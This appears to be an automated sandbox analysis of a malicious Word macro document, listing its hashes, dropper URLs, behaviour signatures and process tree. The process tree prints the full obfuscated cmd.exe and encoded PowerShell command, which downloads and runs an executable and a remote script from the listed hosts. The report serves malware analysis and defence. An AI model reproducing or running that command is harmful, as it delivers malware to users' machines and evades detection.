Analysis

  • max time kernel: 119s
  • max time network: 126s
  • platform: windows7_x64
  • resource: win7-20240221-en
  • resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted: 20-05-2024 04:21

General

  • Target: 5d287802c4aa94113e94ef0e7a0c8803_JaffaCakes118.doc
  • Size: 178KB
  • MD5: 5d287802c4aa94113e94ef0e7a0c8803
  • SHA1: 31a8f4160a82520e1f57899403186603a91a011c
  • SHA256: 16380e6168e31a0098a70f629c0d5a1ade9f3230b322ec4a358fd85cf6bffd56
  • SHA512: 86f7e767de546c19fd4fd50092b5c80819b9c38c3bc83d5bebf8942372709810998f1e5c1ad4cd0d917687c8d849d099834ffd718b231a41c693eb0c2d996108
  • SSDEEP: 1536:G9otKt1KfMVQcklE0zlHHD93ydN94KESgOOVr6PAGI+vu6gTtA61vU9L9vS:rajx2Zl6PAGVu6gTtFC9v

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • ps1.dropper: http://192.48.88.236/stats.php
    • exe.dropper: http://owieoqkxkals.com/VRE/kotner.php?l=miox2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d287802c4aa94113e94ef0e7a0c8803_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^c^A^a^Q^B^l^A^G^8^A^c^Q^B^r^A^H^g^A^a^w^B^h^A^G^w^A^c^w^A^u^A^G^M^A^b^w^B^t^A^C^8^A^V^g^B^S^A^E^U^A^L^w^B^r^A^G^8^A^d^A^B^u^A^G^U^A^c^g^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^0^A^a^Q^B^v^A^H^g^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^Q^A^N^w^A^2^A^D^k^A^M^Q^A^x^A^D^k^A^M^g^A^2^A^D^E^A^N^A^A^4^A^D^c^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^N^A^A^3^A^D^Y^A^O^Q^A^x^A^D^E^A^O^Q^A^y^A^D^Y^A^M^Q^A^0^A^D^g^A^N^w^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^J^A^E^U^A^W^A^A^o^A^C^g^A^T^g^B^l^A^H^c^A^L^Q^B^P^A^G^I^A^a^g^B^l^A^G^M^A^d^A^A^g^A^F^M^A^e^Q^B^z^A^H^Q^A^Z^Q^B^t^A^C^4^A^T^g^B^l^A^H^Q^A^L^g^B^X^A^G^U^A^Y^g^B^D^A^G^w^A^a^Q^B^l^A^G^4^A^d^A^A^p^A^C^4^A^R^A^B^v^A^H^c^A^b^g^B^s^A^G^8^A^Y^Q^B^k^A^F^M^A^d^A^B^y^A^G^k^A^b^g^B^n^A^C^g^A^I^g^B^o^A^H^Q^A^d^A^B^w^A^D^o^A^L^w^A^v^A^D^E^A^O^Q^A^y^A^C^4^A^N^A^A^4^A^C^4^A^O^A^A^4^A^C^4^A^M^g^A^z^A^D^Y^A^L^w^B^z^A^H^Q^A^Y^Q^B^0^A^H^M^A^L^g^B^w^A^G^g^A^c^A^A^i^A^C^k^A^K^Q^A^7^A^C^A^A^R^Q^B^4^A^G^k^A^d^A^A^7^A^C^A^A
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOweRsHeLL.exe -EC …
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2540
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2452

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize: 20KB
    MD5: 62339dedbce1726c48201ad9ab8358f6
    SHA1: f3dbca8ca82025644400c1725cbd5f42ccb6a816
    SHA256: 0f760fa40169367d529ec173e35ed6185d333afa3ce9a2edf9c739cf30e59168
    SHA512: 17857a49d8cf25234cb462e8cae6d14b2375a709c5ed6691785cc4cfe59df6a2a1e0ab67538d4ab0d3953ea683740a61b4b6baad60baf2513bbc420a3d4bab13
  • memory/2808-8-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-7-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-5-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-6-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-10-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-13-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-2-0x0000000070E5D000-0x0000000070E68000-memory.dmp (Filesize: 44KB)
  • memory/2808-0-0x000000002F2B1000-0x000000002F2B2000-memory.dmp (Filesize: 4KB)
  • memory/2808-9-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-11-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-21-0x0000000070E5D000-0x0000000070E68000-memory.dmp (Filesize: 44KB)
  • memory/2808-22-0x00000000002D0000-0x00000000003D0000-memory.dmp (Filesize: 1024KB)
  • memory/2808-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2808-37-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2808-38-0x0000000070E5D000-0x0000000070E68000-memory.dmp (Filesize: 44KB)